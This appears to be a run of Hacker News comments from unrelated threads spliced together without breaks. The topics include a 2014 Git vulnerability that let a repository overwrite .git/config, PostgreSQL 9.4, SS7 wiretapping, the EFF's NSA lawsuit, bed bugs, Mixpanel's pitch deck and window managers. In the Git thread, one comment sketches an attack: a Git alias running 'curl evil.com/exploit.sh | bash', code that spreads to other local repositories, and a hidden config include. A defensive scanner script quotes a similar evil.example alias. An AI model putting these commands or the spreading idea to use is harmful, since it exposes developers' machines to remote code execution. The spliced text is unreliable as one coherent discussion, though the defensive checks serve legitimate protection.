Summary: on case-insensitive/normalizing filesystems (the default on OS X and Windows) it's possible for .git/config to be overwritten by the tree, probably due to a case-sensitive sanity check while the actual filesystem is case-insensitive. .git/config can contain arbitrary commands to be run on certain events/as aliases, so it leads to code execution. This is a risk whenever you get a tree from a third party, so on pull/fetch+checkout/clone...
There's an analogous vulnerability in Mercurial.
Update, then run git --version and make sure it's one of v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, or v2.2.1. And be careful when pulling/cloning from third-parties.
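If you want to check a machine quickly, a small script can compare the output of `git --version` against the patched releases. A minimal sketch, with the version list taken from the maintenance announcement (trust your package manager's advisory over this, and note the newer-than check is only a rough heuristic):

```python
import re
import subprocess

# Patched releases from the maintenance announcement.
PATCHED = {"1.8.5.6", "1.9.5", "2.0.5", "2.1.4", "2.2.1"}

def parse_git_version(output):
    """Extract the dotted version number from `git --version` output."""
    m = re.search(r"git version (\d+(?:\.\d+)+)", output)
    return m.group(1) if m else None

def is_patched(version):
    """True if the version is a known patched release or newer than 2.2.1."""
    if version in PATCHED:
        return True
    parts = tuple(int(p) for p in version.split("."))
    return parts >= (2, 2, 1)

if __name__ == "__main__":
    try:
        out = subprocess.run(["git", "--version"],
                             capture_output=True, text=True).stdout
    except FileNotFoundError:
        out = ""
    v = parse_git_version(out)
    print(v, "patched" if v and is_patched(v) else "VULNERABLE - update now")
```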
EDIT: right, no "or", what are you doing reading this instead of updating?
(I am aware of all the - quite frankly ridiculous - complexity of Unicode characters that are visually identical and "should be treated as such for the purposes of comparison", but I think that's another example of excess complexity leading to things like directory-traversal attacks.)
brew update && brew upgrade git
Maybe alert banners aren't in the git-scm.com css template.
I always get a strange, uneasy feeling when the tin foil hats turn out to be right.
I wonder if they are right on GPG, too. For those who don't know this: The OpenBSD people refuse to sign their releases with that "far too complex" GPG tool, but created their own lightweight "signify" tool instead. 
> A big "thanks!" for bringing this issue to us goes to our friends in the Mercurial land, namely, Matt Mackall and Augie Fackler.
It'd be interesting to hear how they came across this. Matt is the leader of the Mercurial project and Augie is a Mercurial core contributor.
This doesn't seem like a high priority upgrade since GitHub now blocks the vulnerability from being pushed to their servers.
edit: Upgrade ASAP!
The Git core team has announced maintenance releases for all current versions of Git (v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, and v2.2.1).
I have one Windows machine and went to update via http://git-scm.com/download/win (preview version 1.9.4).
It was released 3 months ago, on 2014-09-29.
https://msysgit.github.io has a version 1.9.5 preview, but no documentation that this is a security fix.
Doesn't seem like I can update my git client.
Brian Harry's blog has more information and links to download URLs for the updates: http://blogs.msdn.com/b/bharry/archive/2014/12/18/git-vulner...
Did they find any problems? The post doesn't say...
* create an alias which does something evil "curl evil.com/exploit.sh | bash;", maybe as a typo (commti?) since "to avoid confusion and troubles with script usage, aliases that hide existing Git commands are ignored"
* exploit code finds other local git repos and infects them (maybe avoiding those with github/bitbucket remotes, since they'll be blocked)
* be innocuous-looking via git config's "include", so the bad aliases aren't obviously visible looking at ~/.gitconfig
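As a rough defensive check, you can scan a repo's .git/config (or your ~/.gitconfig) for aliases that shell out: in git config syntax, an alias whose value starts with `!` is executed by the shell. A minimal sketch, assuming a simple INI-style layout (this is not a complete audit, and it doesn't follow `include` directives):

```python
import re

# In git config syntax, the [alias] section maps names to commands;
# a value starting with "!" is run by the shell.
ALIAS_SECTION = re.compile(r"^\s*\[alias\]\s*$")
ANY_SECTION = re.compile(r"^\s*\[")
SHELL_ALIAS = re.compile(r"^\s*(\S+)\s*=\s*!(.*)$")

def find_shell_aliases(config_text):
    """Return (name, command) pairs for aliases that invoke the shell."""
    hits = []
    in_alias = False
    for line in config_text.splitlines():
        if ALIAS_SECTION.match(line):
            in_alias = True
            continue
        if ANY_SECTION.match(line):
            in_alias = False
            continue
        if in_alias:
            m = SHELL_ALIAS.match(line)
            if m:
                hits.append((m.group(1), m.group(2).strip()))
    return hits
```

Shell aliases aren't inherently malicious (plenty of people have legitimate ones), but a typo-squatting alias like the hypothetical `commti = !curl evil.example/x.sh | bash` would show up here.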
What about case-sensitive Mac file systems, like mine? I would imagine they are not vulnerable and that the author just overlooked this possibility in the article...
~ git --version
git version 1.9.3 (Apple Git-50)
You could pull down git hooks that root your box, pretty intense hack, update now!
It seems like there are a lot of people who don't really pay attention to social media or other security alert channels, who won't have a clue about the extent of this vulnerability. I'm sure they'd update if they knew "if I clone a malicious repo, I'm toast," but there's no way to inform them except by HN/Twitter/Reddit/mailing lists.
One could argue that they get what they deserve for being uninformed, but it seems like the ethical obligation might actually be on us to develop tools that ping home and ask whether they need to stop working until they're updated.
Actually, I'm not sure it's ethical to embed such shutdown behavior into a tool that needs to be reliable. Maybe just a scary warning message like "This version is critically vulnerable, update immediately" every time the program runs would suffice.
It's not just the database itself (and that's awesome in its own right), but it's also all the peripheral stuff: The documentation is seriously amazing and very complete, and the tools that come with the database are really good too (like psql, which I still prefer to the various UIs out there).
Code-wise, I would recommend anybody to have a look at their git repo and the way they write commit messages: They are a pleasure to read and really explain what's going on. If everybody wrote commit messages like this, we'd be in a much better place where code-archaeology is concerned.
Patches from the community are always patiently reviewed and, contrary to many other projects, even new contributors are not really required to have a thick skin nor flame retardant suits. The only thing required is a lot of patience as the level of quality required for a patch to go in is very, very high.
Finally, there's #postgresql on Freenode where core developers spend their time patiently helping people in need of support. Some questions could be solved by spending 30 seconds in the (as I said: excellent) manual and some of them point to really obscure issues, but no matter what time it is: Somebody in #postgresql is there to help you.
I think there's no other free software project out there that just gets everything right: Very friendly community, awesome documentation, awesome tools, and of course an awesome product to begin with.
Huge thanks to everybody involved.
Also: Huge YAY for jsonb - I have many, many things in mind I can use that for and I have been looking forward to this for a year now.
PLV8 is such a natural fit with the new JSON(B) types that it's probably going to become the most used extension with that data type... And imho sorely missing from the out of the box experience. I'm glad that they've concentrated on getting the data structure and storage right first. Hopefully we'll see this in vNext.
As to replication, I understand that this is part of EnterpriseDB's business model; all the same, not having the basic replication pieces baked in is still lacking compared to other databases. Even if the graphical tooling were commercial-only, and all the knob-frobbing via config or command line is more complex, having it in the box is a must imho. I actually really like how MongoDB handles their replica sets, and where RethinkDB is going with this as well. Though they aren't primarily transactional SQL databases, it's a must-have feature these days. Replication with automagic failover is a feature that has gone past enterprise-only.
All the same, thanks for all of your hard work, and I look forward to the future of PostgreSQL.
Microsoft tentatively seems to be settling on them as the preferred RDBMS for non-Windows platforms :
> Within ASP.NET 5 our primary focus is on SQL Server, and then PostgreSQL to support the standard Mac/Linux environment.
I use EF+SQL Server and they're very much complementary and provide an excellent developer experience. NHibernate+SQL Server is woeful unless you want to use the loosely-typed Criteria stuff. NH's LINQ provider is terrible and it gets confused at the drop of a hat (call Distinct and then OrderBy? "I'm sorry Dave, I'm afraid I can't do that"). At this point I'm convinced only MS know how to write LINQ providers that won't fall over the moment you try to do something useful with them.
Microsoft writing a LINQ provider for PgSql is a great thing for running .NET code on non-Windows platforms.
They are also clearly reaping the benefits of some very smart architectural decisions, and that gives me the confidence that they will be able to continue innovating in the coming years.
We're just getting into PG now, and it's just really nice to set up and use. I really wish more web stuff properly supported PG and didn't pretty much require MySQL.
That article was written before JSON/JSONB showed up, but the idea remains the same.
I didn't have plv8 installed, so I did some plumbing code in plpython. plv8 would be more suitable though.
It might go against the "no transaction" crowd, but seems useful for performance-critical needs. I'm scheduling a bit of testing time with it next week to see if it's something I'd roll out in production (Maria 10 system)
I'm newer to Postgres so am not sure. Replica Sets are the killer feature for me, more so than just storing JSON documents. I'd appreciate if someone can chime in. I've done some googling but there seem to be multiple strategies for replication.
My favourite parts:
* Allow views to be automatically updated even if they contain some non-updatable columns
* Allow control over whether INSERTs and UPDATEs can add rows to an auto-updatable view that would not appear in the view. This is controlled with the new CREATE VIEW clause WITH CHECK OPTION.
* Allow security barrier views to be automatically updatable
Is attribute order stable? Obviously, order is not preserved, but if the order changes on subsequent accesses, this causes problems if you ever serve content directly from a jsonb field without sorting the attributes manually.
Are there any code examples (preferably Python) that show how to use JSONB? I'd love to see some examples on how to query every record that contains a key in a json, or order rows based on a value in a json object.
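Not a full application, but the SQL side is the interesting part. Assuming a hypothetical table `docs(id serial, data jsonb)`, the queries below sketch key-existence (`?`), containment (`@>`, which can use a GIN index), and ordering by a value inside the document (`->>` extracts text, so cast for a numeric sort); you'd run them from Python via a driver like psycopg2 (connection code omitted):

```python
# Hypothetical table: CREATE TABLE docs (id serial PRIMARY KEY, data jsonb);

# Rows whose jsonb document contains a given top-level key (the ? operator).
HAS_KEY = "SELECT id, data FROM docs WHERE data ? %s"

# Rows whose document contains a sub-document (the @> containment operator).
CONTAINS = "SELECT id, data FROM docs WHERE data @> %s::jsonb"

# Order rows by a value inside the document; ->> extracts it as text,
# so cast it to numeric for a proper sort.
ORDER_BY_VALUE = "SELECT id FROM docs ORDER BY (data ->> 'score')::numeric DESC"

# With psycopg2 you would do roughly:
#   cur.execute(HAS_KEY, ("user",))
#   cur.execute(CONTAINS, ('{"tags": ["postgres"]}',))
```

On the key-order question above: jsonb does not preserve input key order (keys are stored sorted), but the stored order is deterministic, so repeated reads of the same document serialize identically.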
off topic: If Meteor.js implements PostgreSQL 9.4 I would seriously consider using it again. That and maybe make DDP scalable.
I don't know what authentication is required. I expect that it was designed so that only your cell carrier could enable it, however whatever may have been secret about it, quite likely has leaked out by now.
If you don't want to be listened-to, don't have _any_ cell phones anywhere near you. Not just your own - say you want a private conversation in a public place; the phones of other people in your general vicinity could be switched on to listen to you.
I learned this from a well-known left-wing radical organization known as the United States Air Force, when I applied for the USAF Cyber Command. Their site had a recruiting video, that depicted a couple officers locking their phones into a grounded metal box - a faraday cage - before entering a secure area, that is, a room where secrets were openly discussed.
The main function of SS7 is call setup. All the switches along the route get their switching commands over SS7, not over the circuit-switched channel. (That went out with SS5, the old audio-tone based system). Call setup is preceded by "translation", turning a destination phone number into a route. That's done with query messages over SS7.
This allows outsourced wiretapping. Verisign offers this as a service for telcos, so they don't have to deal with law enforcement themselves.
Verisign, which also runs much of the US SS7 network (http://www.verisign.com/stellent/groups/public/documents/dat...) is well placed to do this. All they have to do for a wiretap is to have the translations for a source or destination number reroute to a wiretap point, which then records while forwarding to the desired destination. As an SS7 provider, they already have all the call metadata.
Vulnerabilities come in because more parties now have SS7 access. Cellular roaming and VoIP-to-landline routing are managed over SS7. So a large number of computers other than dedicated telco switches now have SS7 connections. A break-in at any of those points has wiretapping potential.
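The translation-based reroute described above can be caricatured in a few lines. This is purely a toy model (nothing here resembles real SS7 messages), just to show why controlling translation amounts to controlling the route:

```python
# Toy model: "translation" maps a dialed number to a route (list of switches).
routes = {
    "+15551234": ["switch-a", "switch-b", "dest-trunk"],
}

def translate(number, tapped=frozenset()):
    """Return the route for a number, inserting a recording point if tapped."""
    route = list(routes[number])
    if number in tapped:
        # A wiretap is just an extra hop that records and forwards;
        # the caller and callee see nothing different.
        route.insert(-1, "wiretap-point")
    return route
```

The point of the sketch: whoever answers translation queries decides every hop a call takes, metadata included.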
1. Alexandria needs to communicate with Bilbo. Alexandria has the privilege of being trusted by whatever organization she belongs to (be that her country, company, etc) and as such is unmonitored AFAsheKs. Bilbo on the other hand is some fugitive-type and is unable, or perhaps unwilling, to enter direct communication with Alexandria for fear of compromising himself or his beloved Alexandria. Bilbo could then monitor Alexandria's calls for an encoded message via a protocol they predetermine. This protocol could take the form of linguistic or audio steganography. One could imagine all sorts of information being leaked by Alexandria.
2. More realistically, this could be a tool for bribery. Monitor a set of vulnerable targets, wait until they reveal something, take a bribe to stay quiet.
3. Or, for the Machiavellian-minded: leak information that was supposedly confidential between two parties.
Edit: phones are forbidden due to the recent spying events.
The hack of the Belgian telco Belgacom sees more light day by day.
This system is broken beyond repair. We need to rebuild it from the ground up, safely.
The 3G/4G segment of subscribers will have a distribution of 3.4 billion using 3G (SS7) services and .9 billion using 4G services. The total outcome of this research indicates that a total of 7.65 billion subscribers, out of a total of 8.5 billion subscribers, will remain on SS7-based networks in 2017.
Verizon went on to further explain that a final 2G/3G (SS7) sunset timeframe decision has not been made.
The good news is vendors are not happy: the availability of hardware will decrease significantly over the same time period, hopefully speeding the sunset for this technology.
Some service providers are planning on a strategy of consolidating their network, having no support and cannibalizing existing spare equipment for hardware support.
If you are in the bay area, I highly encourage you to go (this one is very near the Oakland 12th St BART). You are watching history in the making.
And select EFF as your Smile charity. THEN get the browser extension to automatically redirect you to the Smile link:
EDIT: I only use the chrome extension, if someone has a better FF extension just let me know and I'll change the link, that was the first one I found.
Love it. I hadn't thought of it like that before. Just because your search is fast doesn't mean it's not a search.
>Jewel was filed in 2008 on behalf of San Francisco Bay Area resident Carolyn Jewel and other AT&T customers.
This isn't a new lawsuit, it has just taken forever to even get to this point. The main focus of this case isn't from the Snowden documents but the Snowden documents did open up the case to actually go forward without State Secrets censorship.
However, if we don't help US citizen for their democracy, we'll have no weight for ours.
Let them know we won't accept the status quo.
As noted above, however, all upstream collection, of which "about" collection is a subset, is selector-based, i.e., based on . . . things like phone numbers or emails. Just as in PRISM collection, a selector used as a basis for upstream collection is not a keyword or particular term (e.g., "nuclear" or "bomb") but must be a specific communications identifier (e.g., email address). In other words, the government's collection devices are not searching for references to particular topics or ideas, but only for references to specific communications selectors used by people who have been targeted under Section 702.
In other words, the NSA is searching for the communications of specific people - it's targeted collection. The EFF itself even concedes that they are filtering out wholly domestic communications. Instead of questioning the specific procedures for targeting these people, the likelihood that they may fail and collect an innocent bystander's communications, the procedures dealing with incidental or accidental collection, etc., they are instead taking the stance that the filtering itself is illegal because a packet filter needs to see a packet before determining whether or not it matches the specific communication. As an analogy, if I were to pull up my terminal and run:
$ seq 1 3 | grep -v 2 | grep 3 > out.txt

then under that theory the first grep has already "searched" the 2 it filtered out, even though nothing downstream ever sees it.
I think I see why the EFF is making that argument: in Clapper v. Amnesty International it was ruled that the plaintiff didn't have standing because they couldn't show that their specific communications had been collected. Jewel v. NSA would likely have the same issue, so to get around it the EFF is instead arguing that the very fact that the NSA is conducting any sort of packet filtering itself constitutes a search and seizure, regardless what safeguards are put in place or whether the filtering is targeted. I think they're grasping for straws with this one - I'd be really surprised if they win. If I were in their place, I'd probably FOIA the hell out of the 702 procedures and look for loopholes instead.
The court thus faulted them [the ACLU in ACLU v. NSA, 493 F.3d 644, 648] for assert[ing] a mere belief that the NSA eavesdropped on their communications without warrants. Id. This failure of proof doomed standing. Ultimately Jewel may face similar procedural, evidentiary and substantive barriers as the plaintiffs in ACLU, but, at this initial pleading stage, the allegations are deemed true and are presumed to embrace the specific facts needed to sustain the complaint. 
EFF is on a fishing expedition. I am not unsympathetic. But this judicial arm-twisting and absurd twisting of language / law needs to stop as the road it opens is not helpful to our democracy. They will never be able to justify their claims with anything that will pass evidentiary muster.
Supporting the EFF is all fine but generally a waste of time and money for effecting real change. The only way these programs end is if Congress is full of people who want this to stop and will ensure that it does.
If an obscure libertarian like Grover Norquist can dominate electoral cycles with a "Taxpayer Protection Pledge" why can someone not similarly dominate electoral cycles with a "Privacy Protection Pledge"? Demand every presidential candidate sign it, etc. Make it a real wedge issue.
I wonder if the answer is that US citizens don't care because they don't really see how they are harmed? They believe the Govt is protecting them by doing this?
: http://cdn.ca9.uscourts.gov/datastore/opinions/2011/12/29/10... [pdf]
Fucking unhelpful to frame mental illness like this.
It is intensely frustrating to see people suffering - to the point where they consider suicide - because of the stigma around mental illness.
Everybody gets small phantom itches from time to time. I think the idea of an "itch nerve malfunction" makes the most sense. One could imagine some sort of infinite loop of itch nerves triggering each other, exacerbated by constant scratching.
Any strange psychological behavior, such as extreme cleanliness, or being convinced that ordinary clothing fibers are the cause, would be an obvious natural response if you couldn't figure out why you were suddenly so itchy.
Also, anyone who has to deal with contact lenses knows that our hands and fingers always have tiny little fibers stuck to them.
You can see an extreme example of this itching in alcohol and benzodiazepine withdrawal - apparently it causes feelings of your skin crawling.
I don't really have anything interesting to add to the discussion, just that it's difficult to see a relative suffer like that.
Another problem with phantom feelings is that they can overlap with actual feelings. That means the brain feels an itch on the hand, for example, and scratching that part triggers a relief response. This not only temporarily "fixes" the itch, but also strengthens the belief that the itch is real. After countless such confirmations it can become near impossible to convince yourself that it is not real.
Now, the relation to the story about Morgellons: bed bug bites can be extremely itchy and cause large welts on some people (not everyone, as it is an allergic reaction). This was true in my case. The welts tended to be about the size of a silver dollar and last for about a week before subsiding.
We had contracted the bed bugs at a house party we had attended, where I had gotten a few bites. We assumed they were mosquito bites and didn't think another thing about them. About 2 weeks after that I started getting bites while I was sleeping. Never having been exposed to bed bugs, I first assumed mosquito bites or perhaps spider bites. Neither of these turned out to be true.
After two more weeks I began to feel very crazy for lack of a better word. The itching from the bites was driving me wild and we could not figure out what was biting me. (The infestation was never a large one, most likely it started from a single insect). I went to the student health clinic (we were graduate students at the time). They concluded bug bites but we were not sure because we could not find any bugs!
I made an appointment with a private dermatologist. Now, before I got in to see him we did more research. We did turn up bed bugs as a possibility, and we looked, but not thoroughly enough, and found nothing. (It turns out they are very, very good at hiding). The research turned up all kinds of crazy things like Morgellons disease and various mite-related infestations, such as bird mites. Having a bird, we became alarmed at that particular possibility, as bird mites are tiny and very difficult to get rid of.
The internet research made my psychological condition rapidly deteriorate. I worried constantly about the different possibilities. It affected my ability to do research. It affected my ability to properly TA. I was becoming psychotic in my search for the cause of the itching that would not cease.
Finally, I got in to see the private dermatologist. He suggested bed bugs and told us to search again. This time the infestation had grown, and we found them. It was such a relief to know the cause.
However, the cure is neither fast nor simple nor cheap for bed bugs. Insecticides are largely ineffective: bed bugs only eat mammalian blood, and the most effective insecticides these days need to be ingested by the organism. The most effective approach is physical removal of the insects, their eggs, and their larvae. The eggs and larvae are tiny and it takes very careful searching to find and clean them all.
We spent every night for months searching with magnifying glasses and powerful flashlights while washing and drying our bedding (heat treatment (or cold) is the only sure-fire solution to bed bugs). It took many months, but eventually we found them all and, with the help of the pest man's insecticides, prevented the infestation from growing out of control. Needless to say, we moved and bought a new bed when our lease was up!
Even today, years later, I still fear unexplained itching. I think that I could have developed a psychosis where I believed I was being bitten by invisible bugs if we had not found the infestation. It took a long time for my mental state to recover, and if it had gone on for 6 or 12 months of unexplained bites and itching I may have become very unstable. Itching is very difficult to deal with.
I hope that someone can help these people find an effective way for them individually to deal with the itching even if for some it is only in their minds.
I've been playing with Smalltalk recently, and it's really interesting as an environment. It has a number of RAD tools built in - the flexible Morphic GUI, the image system allowing you to store state without explicitly dealing with a database, and being able to develop from the same environment that your code runs in, allowing quick turn-around in adding and testing features - and I'm wondering why it's not used more often for line-of-business applications.
I'm not going to say their deck doesn't have value, but I will say it doesn't seem like it has much of one. Maybe that's the point.
Take note of a few things:
* They don't use BS "corporate speak" -- no synergies of optimizing user solution metric analysis.
* There's no fluff. Just, none. Problem. Solution. How We're Doing. Why We're Better. What We Want To Do. The Landscape.
And it worked. This should be the baseline for every pitch deck.
Seems being concise, using facts and getting to the point quickly is the way to go. I've seen a lot of companies go as far as creating pitch videos with fancy production, graphics, voiceovers and a soundtrack, trying to use fancy visuals to get funding.
Congratulations on the recent funding round. You have a great product Mixpanel.
I wonder what their MRR x 12 is multiplied by to reach the $865M valuation.
AVG MRR x 12 x ?? = $865,000,000

Is it 100 ($8.65m ARR)?
Is it 50 ($17.3m ARR)?
Is it 25 ($34.6m ARR)?
What is the average valuation multiple for SaaS? Is it higher or lower than other Startup models (consumer, yearly subscription)?
If one was to replicate a similar valuation with their SaaS what would it take?
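The arithmetic from the comment above, spelled out (the multiples are guesses; only the $865M valuation is from the announcement):

```python
VALUATION = 865_000_000  # reported valuation in USD

def implied_arr(multiple):
    """ARR implied by a given valuation-to-ARR multiple."""
    return VALUATION / multiple

for m in (100, 50, 25):
    print(f"{m}x -> ${implied_arr(m) / 1e6:.2f}M ARR")
# 100x -> $8.65M ARR, 50x -> $17.30M ARR, 25x -> $34.60M ARR
```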
Something went wrong. Try another search term?
Simple and to the point, then moving onwards to the next query. This engine is next level.
From Smash Mouth to cryptography and signet rings.
From what I can tell: "Fush Yu Mang" was an album, albums were once made as LPs, which were developed by Western Electric, which was an appendage of AT&T back during the Ma Bell ("We don't care. We don't have to. We're The Phone Company.") days, which had a statue called The Spirit of Communication at its 195 Broadway location, which jumps directly to AUTODIN for some reason (195 Broadway was owned by Western Union... ?), which leads to leased lines, which leads to OSI, PKI, csexps, digital signatures, and signet rings.
It's like when I take too much caffeine.
> Many types of aquatic animals commonly referred to as "fish" are not fish in the sense given above; examples include shellfish, cuttlefish, starfish, crayfish and jellyfish.
>
> The End
It generally has a pale yellow color, but varies from deep yellow to nearly white.
In telecommunication and radio communication, spread-spectrum techniques are methods by which a signal (e.g.
"The first large proton synchrotron was the Cosmotron at Brookhaven National Laboratory, which accelerated protons to about 3 GeV (1953-1968)."
"The stated purpose of the one-party state was to ensure that capitalist exploitation would not return to the Soviet Union and that the principles of Democratic Centralism would be most effective in representing the people's will in a practical manner."
Absolutely amazing and chilling at the same time. I typed in "sex" and had 1 minute of free time. It seemed coherent but the subject matter seemed to drift far away. Some tweaking and it would be very convincing.
I'll go out on a limb and say that if this pattern continues, it may be the most significant legacy of heartbleed.
There are plenty of apps that provide varying levels of window-manager functionality to OS X. I would try a couple out and see which feels right to you. I have tried most of them, and personally prefer Moom.
Amethyst tries to bring the XMonad experience to OSX. I think it does an admirable job, but there are some distinctions. Amethyst is simpler to set up, and is more forgiving to newcomers. It has a GUI for configuration, and an easily accessible list of commands. It also works on top of OSX's WM, so it's not so enormous a departure, especially compared to XMonad's fairly extreme dismissal of the mouse.
On the down side, XMonad really outshines Amethyst when it comes to performance. Amethyst is downright sluggish, where I've always found XMonad to be very responsive. Still, it's overall a true enough translation, and the sluggishness rarely actually hinders productivity. Overall, I think Amethyst is a capable daily driver, and a great intro to tiled window managers.
I've been told focus follows mouse was impossible on OS X.
At the moment, I'm using Spectacle for OSX. http://spectacleapp.com/. Are there reasons I should use Amethyst instead? I'd love to see a feature matrix or something in your FAQ about the other options, and what Amethyst brings to the table.
I've noticed it gets a little slow to rearrange things sometimes with lots of windows but the functionality I need is all there.
Works great with my three screen setup too, which many tools like this don't.
I, maybe, have one or two apps sharing a single workspace. Most apps are in full screen.
I'm asking this question because I'm quite comfortable with SizeUp and don't understand if learning how to use a WM is worth it.
Not really family/adoption:
To be honest, the whole history of the Houshi family is kind of a mystery. There was no real documentation on paper back then. No photos, and paintings or such were only for rich people. Yet, the whole town kinda grew around the hot springs and this one hotel in particular. So the history of the hotel and the family is very much connected with the history of the town. That's also where the proof for the Guinness Bureau came from. They wouldn't just accept them saying "yea, we old."
What changed in 2011: An even older hotel submitted their application.
Also: as far as I found out, that older hotel is not a straight "same-family" business, or at least not anymore. I'm a bit sceptical of that posted source below. There's an association for family businesses older than 200 years AND still running, and that hotel is not part of that, Houshi is.
The daughter's motivation: I shot this film over the course of six days, in April and in June. When I was doing the interviews in April, the daughter didn't actually know that her father had decided that she should take over. I was the one who told her during the interview (having assumed she was already aware of it, of course). She officially started in May, and when I came back in June, she was much more adjusted. She's actually doing pretty well. There's also a second son, who has worked in the hotel longer than the daughter, but according to the father, he's not smart enough to manage the inn. The daughter is actually much stronger and smarter than she thinks she is. That's why the father chose her. In 1,300 years, no woman was the official owner of the inn. However, they were allowed to be "temporary owners" until the son came of age or someone was adopted. Yet, the father is now considering giving the daughter the title of Zengoro. She would be the first woman in 1,300 years to wear that title. But it's not final yet. I'm considering going back there in a couple of years to see what's changed.
The first born son gets trained from day one to become the owner. The daughter wasn't properly prepared. Yet, she loves her family dearly and is caught between her love, obligation and duty. For someone carrying the weight of 1,300 years and 46 generations, she is doing remarkably well.
Rates start from ¥9900/person (~US$83) for a midweek stay with two meals, although better rooms and meals can cost considerably more.
Reviews seem a bit mediocre though: this is a large ryokan geared for large groups, and not particularly luxurious as far as these things go.
I always wondered what the morally just position would be on such long-standing establishments when it comes to inheritance of responsibility.
On the one hand, kids of such a family shouldn't be tied to the family business if they don't find it fulfilling. On the other hand, if they don't continue the line, traditions might die, and with them such old and interesting places as this one or any other.
But as datamatt writes, I guess adult adoption does help with that. If kids in such family feel that they are not up to the task, their parents can adopt a person (a man in this case) who will continue with this tradition.
I wondered what happened in 2011
As someone else pointed out, the daughter seems to be sad. I hope she is able to find someone to make her happy and is able to let her do what makes her happy.
The selection is pretty decent, definitely comparable to Google Shopping Express.
One very odd note though: they ask for a variable tip to the delivery courier (something Google doesn't do). So even for "free" 2-hour delivery, you're paying for delivery. While I see how this is better for the courier, I think it's a big mistake: people hate navigating the social dilemma of how to tip properly, and solving social dilemmas is a key advantage of digital services.
Now, for prime members in NYC at least, Amazon is a viable option.
What other moats do local stores have? Amazon wins on:
* selection
* cost
* convenience
* reputation
* knowledge (this depends on the local store)

Local stores still win on:

* feel-good factor (supporting local business and employment)
* holding the item in your hand (not sure there is one word for it in English, but the Germans probably have one)
* I need it now
Amazon has been building warehouses all across the country near cities to reduce shipping times. But the retailers already have what amounts to hundreds of warehouses at every population center, plus the inventory management systems. Why haven't they put their inventories online and offered same day delivery to neutralize Amazon?
(if you don't remember Kozmo, this was done by a reporter during the last dotcom boom/bust as a joke)
And how about returns? Can I return stuff in one hour too?
Very interesting how ideas from the first bubble re: brick-and-mortar are coming back.
Submitted here, to get a wider audience, and ask: does anything in Rust preclude this from being done in Rust rather than OCaml? Sounds like a nice idea...
Some of these -- the domains for the federal government's executive branch -- were already public. What's new is the rest of the federal government (e.g. Congress, the courts), as well as all the .gov's in states, territories, counties, cities, and native tribes.
There's about 5,300 of them.
However, I do appreciate the transparency.
I guess some of the interesting things you might be able to do include analyses like: 1) Which states/counties have more .gov websites for their municipal functions, 2) Which states/counties have the most disparity in municipal-function websites.
There's probably some interesting things you could ascertain from this data set given a weekend and some drive.
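The per-state comparison in (1) and (2) above could be sketched in a few lines of Python over the published CSV. Note the column names and sample rows here are assumptions for illustration, not the real schema of the release:

```python
import csv
import io
from collections import Counter

# Toy rows in the rough shape of a .gov registry export
# (column names are guesses, not the actual published format).
SAMPLE = """Domain Name,Domain Type,State
example1.gov,City,TX
example2.gov,County,TX
example3.gov,City,OH
"""

def gov_domains_per_state(csv_text):
    """Count .gov registrations per state from a CSV export."""
    counts = Counter()
    for row in csv.DictReader(io.StringIO(csv_text)):
        counts[row["State"]] += 1
    return counts

counts = gov_domains_per_state(SAMPLE)
print(counts.most_common())  # [('TX', 2), ('OH', 1)]
```

Normalizing these counts by state population would get you closer to the "disparity" question in (2).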
He founded and ran a lean organization on grit and thriftiness when the Toyota Production System was taking its baby steps in Japan.
I heartily suggest Ben Rich's 'Skunk Works' to anyone who gets a kick out of a true story of what it actually means, in terms of output, when an innovative engineering team actually works lean... in hardware.
The lack of this is the #1 problem with professional software engineering.
any examples out there?
I noticed they mentioned Heap Analytics (https://heapanalytics.com/) as one of their competitors. We've been using Heap for over a year and it seems like the logical and magical next step in analytics. Mixpanel gave you smarter analytics on things you had the foresight to track, but Heap automatically tracks everything from the day you integrate it. That means you can get smart analytics even on things you didn't have the clairvoyance to start tracking 6 months ago, or didn't have the resources to insert tracking code in.
For startups, Heap's automatic and retroactive tracking is huge. It means we can iterate on product features and marketing/outreach schemes way more quickly while still getting insight into what's successful and what's not. It's not perfect--a couple times we've added special class names to our HTML elements so Heap can distinguish them, but that's still easier than adding manual tracking code--but it's a huge improvement over the old way.
I noticed Heap has a page comparing themselves with Mixpanel (https://heapanalytics.com/compare/heap-vs-mixpanel) but I don't see anything similar from Mixpanel's POV. I'd be curious to hear what Mixpanel's plans are in this area (automatic/retroactive tracking).
These are questions for the business, but I feel like Mixpanel could add so much more context. "We noticed that 'time to first interaction' has gone down with 'watched home page video'." That would at least be a clue.
MP has the data, but all of that analysis is manual (or was, last time I used it).
I believe the main reason there are fewer women in tech is because there are fewer women in tech(!) It's really hard to jump into a new field where you're the extreme minority. Just as a crude example, imagine getting into nursing school as a guy. That would take a lot of guts. I know because I have a friend who did it, and you can easily imagine the kind of comments he gets all the time from families, strangers, administrators, etc. However, if there were more guys in nursing, it wouldn't be as hard.
You can also think about being gay in San Francisco right now vs. 50 years ago. Yes, a lot of things have changed, but part of the reason it's getting much better is that there simply are more gay people; you know you're not alone.
I'm not sure if this was a good example. But women in tech are a bit similar. It's hard to jump in when you're the minority. It's much easier to take the easy route and get a profession where there's already a good ratio of men/women.
Why am I saying all this? Because I think women-only events help girls looking to move into tech understand that there actually are women in tech. If we'd only have mixed-in events, the few women in the crowd would easily be missed by the overwhelming majority of guys.
Someone also posted something about Black and Latino/Hispanic founders. That's extremely related. A black friend of mine told me that one of the hardest things about being black in the tech community is that he's almost always the only one. It takes a lot of guts to be the only different one in the room. Some people like that, but for lots of people it's hard. Personally, as an introvert, I'd hate to have everyone looking at me the second I enter the room, all the time.
Though I'd definitely learn a lot at this conference, I'm not going to apply for an invitation because I'd rather see the limited invitations go to people who can make the most of them. I'm not founder material, so I should wait until the videos get released. If I was mistakenly given an invitation, I'd politely and humorously report it as a bug in their optimization algorithms. ;-)
HN users tptacek and cpercival are known representatives of a specific minority in tech, namely, people with a reasonable grasp of crypto. If there was a specialized conference of this crypto-cogent minority, the people who would gain the most from the conference are either already crypto-cogent, or are considering becoming crypto-cogent. The rest of us crypto-ignorant people (myself included as an admitted crypto-failure) are much better off always trying to learn from the experiences they generously share. If the title of this story was, "Crypto Conference 2015 Applications Are Open," I'd like to believe people on HN would not be arguing whether specialized cryptography conferences should exist.
All conferences are specialized in some sense. Learning from the unique perspectives and experiences of said specialization is one of the main reasons for going to any conference. The other reason is networking with your peers. The specialization can be a field, topic, group, or some other commonality. In this case, the specialization is Female Founders, and the chance to learn from them is a fantastic but rare opportunity. The same is true for any specialized group of notable people speaking on topics where they have the benefit of experience and perspective.
My challenge to you, the regular HN user, is: can you tell me something interesting about the accomplishments of any of the speakers?
